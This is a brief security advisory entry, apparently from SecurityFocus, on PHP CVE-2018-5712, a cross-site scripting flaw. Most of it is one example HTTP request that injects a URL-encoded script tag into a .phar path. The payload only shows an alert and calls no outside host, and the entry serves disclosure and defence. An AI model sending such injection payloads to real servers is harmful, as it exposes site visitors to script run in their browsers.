PHP CVE-2018-5712 Cross Site Scripting Vulnerability

The following example request is available:

GET /myapp.phar/%3cscript%3ealert()%3c/script%3e HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1


 

Privacy Statement
Copyright 2010, SecurityFocus